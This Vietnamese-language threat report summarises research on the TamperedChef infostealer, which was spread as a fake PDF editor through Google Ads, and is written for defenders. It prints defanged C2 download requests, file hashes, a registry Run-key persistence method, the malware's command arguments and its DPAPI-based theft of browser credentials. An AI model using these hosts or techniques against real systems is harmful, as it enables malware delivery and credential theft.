Các nhà nghiên cứu an ninh mạng tại Truesec đã khám phá một chiến dịch mã độc tinh vi, phát tán một trình chỉnh sửa PDF độc hại dưới danh nghĩa “AppSuite PDF Editor”. Chiến dịch này, bắt đầu từ ngày 26 tháng 6 năm 2025, liên quan đến nhiều trang web quảng bá phần mềm như một tiện ích miễn phí. Các phát hiện này trùng khớp với những báo cáo của Expel về các mối đe dọa tương tự như ManualFinder.

Chiến Thuật Lây Nhiễm và Hoạt Động Ban Đầu

Ngụy trang phần mềm và quảng bá

Kẻ tấn công đã sử dụng các trang web và chiến dịch quảng cáo trực tuyến, đặc biệt là Google Ads, để quảng bá phần mềm “AppSuite PDF Editor” như một công cụ tiện ích miễn phí. Mục tiêu là thu hút người dùng tải xuống và cài đặt phần mềm, ngụy trang một cách khéo léo để tránh nghi ngờ ban đầu.

Quá trình cài đặt và tải payload

Khi thực thi, tệp tin độc hại PDF Editor.exe thể hiện mức độ làm xáo trộn cao, có khả năng được tạo bằng AI hoặc mô hình ngôn ngữ lớn. Sau khi người dùng chấp nhận EULA (Thỏa thuận cấp phép người dùng cuối), trình cài đặt thực hiện một yêu cầu HTTP GET đến máy chủ điều khiển để báo hiệu quá trình bắt đầu.

Tiếp theo, nó tải về payload chính từ một URL khác. Việc hoàn tất cài đặt sẽ kích hoạt các yêu cầu GET bổ sung để xác nhận và thiết lập cơ chế duy trì trên hệ thống bị nhiễm.

GET hxxp://inst.productivity-tools.ai/status/InstallStart?v=1.0.28.0&p=PDFEditor&code=EN-US
GET hxxp://vault.appsuites.ai/AppSuites-PDF-1.0.28.exe

Phân Tích Kỹ Thuật Mã Độc TamperedChef

Các Chỉ Số Thỏa Hiệp (IOCs) của chiến dịch

Các nhà nghiên cứu đã xác định các chỉ số thỏa hiệp (IOCs) sau cho tệp tin PDF Editor.exe:

• MD5:6fd6c053f8fcf345efaa04f16ac0bffe
• SHA1:2ecd25269173890e04fe00ea23a585e4f0a206ad
• SHA256:cb15e1ec1a472631c53378d54f2043ba57586e3a28329c9dbf40cb69d7c10d2c

Các URL máy chủ điều khiển (C2) ban đầu bao gồm:

• hxxp://inst.productivity-tools.ai
• hxxp://vault.appsuites.ai

Chiến dịch này có liên quan đến việc phân phối infostealer TamperedChef, một loại mã độc chuyên đánh cắp thông tin.

Cơ chế duy trì và kiểm soát

Phần mềm độc hại thiết lập cơ chế bền vững bằng cách thêm một khóa registry vào HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun. Khóa này có các đối số như --cm để kiểm soát hành vi, đảm bảo nó tự khởi động cùng hệ thống.

Ban đầu, phần mềm có vẻ lành tính, với các cơ chế thăm dò cập nhật thông qua một tệp .js. Tuy nhiên, từ ngày 21 tháng 8 năm 2025, các hệ thống bị nhiễm bắt đầu nhận lệnh kích hoạt infostealer TamperedChef, bổ sung một mục registry mới cho PDFEditorUpdater với đối số --cm=--fullupdate.

Điều này dẫn đến việc tải payload đã làm xáo trộn vào thư mục /resources/app/w-electron/bun/releases/pdfeditor.js. Payload này hỗ trợ nhiều đối số --cm khác nhau, cho phép kẻ tấn công điều khiển các hành động như:

• --install: Cài đặt các thành phần mới.
• --enableupdate: Bật chức năng cập nhật.
• --disableupdate: Tắt chức năng cập nhật.
• --fullupdate: Thực hiện cập nhật toàn diện.
• --partialupdate: Thực hiện cập nhật một phần.
• --backupupdate: Cập nhật sao lưu.
• --check: Kiểm tra trạng thái.
• --ping: Gửi tín hiệu kiểm tra kết nối.
• --reboot: Khởi động lại hệ thống.

Chức năng đánh cắp dữ liệu (Infostealer)

Khi được kích hoạt, TamperedChef sử dụng DPAPI (Data Protection API) để truy vấn các cơ sở dữ liệu trình duyệt nhằm đánh cắp dữ liệu nhạy cảm. Nó cũng quét tìm các sản phẩm bảo mật và chấm dứt các tiến trình trình duyệt để truy cập thông tin bị khóa, bao gồm cả thông tin đăng nhập.

Đây là một nguy cơ rò rỉ dữ liệu nghiêm trọng, ảnh hưởng đến thông tin cá nhân và tài khoản của người dùng, đặc biệt là các thông tin đăng nhập và dữ liệu duyệt web.

Khả năng leo thang đặc quyền tiềm ẩn

Trong một số trường hợp cài đặt, một binary elevate.exe được biên dịch lại từ mã nguồn mở bởi Johannes Passing và được ký bởi ECHO Infini xuất hiện cùng với PDF Editor. Binary này có thể được sử dụng để leo thang đặc quyền trong tương lai, mặc dù chưa có dấu hiệu thực thi nào được quan sát trong các trường hợp phân tích.

Chiến Thuật Quảng Bá và Mối Liên Hệ Đáng Ngờ trong Tấn Công Mạng

Tận dụng Google Ads để phát tán

Chiến dịch tấn công mạng này đã tận dụng Google Ads để quảng bá phần mềm độc hại. Dữ liệu lưu lượng truy cập cho thấy ít nhất năm ID chiến dịch và các nguồn giới thiệu khác nhau, cho thấy phạm vi tiếp cận rộng lớn. Việc sử dụng Google Ads để phát tán phần mềm độc hại không phải là mới và ngày càng trở nên phổ biến.

Kẻ tấn công đã tối đa hóa số lượt tải xuống trước khi vũ khí hóa công cụ, kéo dài 56 ngày trước khi kích hoạt độc hại. Thời gian này phù hợp chặt chẽ với chu kỳ quảng cáo 60 ngày thông thường, cho phép chúng thu hút tối đa nạn nhân trước khi triển khai chức năng độc hại.

Chữ ký số giả mạo và các thực thể liên quan

Các chữ ký số trên các biến thể của mã độc này đến từ các chứng chỉ đáng ngờ được cấp cho các thực thể như ECHO Infini SDN BHD, GLINT By J SDN. BHD, và SUMMIT NEXUS Holdings LLC, BHD. Đáng chú ý, trang web của ECHO Infini có vẻ được tạo ra một cách chung chung bằng AI và chia sẻ địa chỉ với các công ty đáng ngờ khác, làm tăng thêm sự nghi ngờ về tính hợp pháp.

Các cuộc điều tra cũng phát hiện mối liên hệ với BYTE Media, một thực thể có chứng chỉ đã được sử dụng để ký các phần mềm độc hại không liên quan khác như Epibrowser. Điều này cho thấy mạng lưới phức tạp và sự lặp lại trong chiến thuật của nhóm tấn công.

Lịch sử hoạt động của nhóm tấn công

Các cuộc điều tra đã truy dấu các hoạt động của nhóm tấn công này từ ít nhất tháng 8 năm 2024. Chúng bao gồm việc phân phối các chương trình không mong muốn (PUPs) như trình duyệt OneStart và Epibrowser.

Các PUP này thường được đóng gói với mã độc có khả năng liên hệ với cùng các máy chủ C2 (Command and Control) đã được sử dụng bởi TamperedChef. Các mẫu của OneStart thể hiện hành vi và dấu hiệu kỹ thuật tương tự, cho thấy một mô hình nhất quán trong việc ngụy trang mã độc dưới dạng các công cụ tiện ích hợp pháp.

Khuyến Nghị và Biện Pháp Phòng Ngừa

Chiến dịch này nhấn mạnh những rủi ro khi tải xuống và cài đặt phần mềm từ các nguồn không xác định hoặc thông qua quảng cáo trực tuyến. Các công cụ tưởng chừng vô hại có thể nhanh chóng trở thành độc hại, gây ra nguy cơ cao về rò rỉ dữ liệu.

Truesec khuyến nghị các tổ chức và người dùng cá nhân cần kiểm tra kỹ lưỡng các phần mềm từ các nguồn không rõ ràng. Theo báo cáo của Truesec về TamperedChef, việc thẩm định phần mềm là cực kỳ quan trọng.

Google đã phản hồi tích cực đối với các báo cáo và kêu gọi người dùng thông báo cho các CERT (Computer Emergency Response Team) địa phương và công ty về các mối đe dọa tương tự. Với các biến thể liên tục xuất hiện, danh sách băm (hash) không phải là dấu hiệu nhận biết duy nhất. Cần có các biện pháp phòng vệ đa lớp và nâng cao nhận thức về an toàn thông tin để chống lại các mã độc phức tạp như TamperedChef.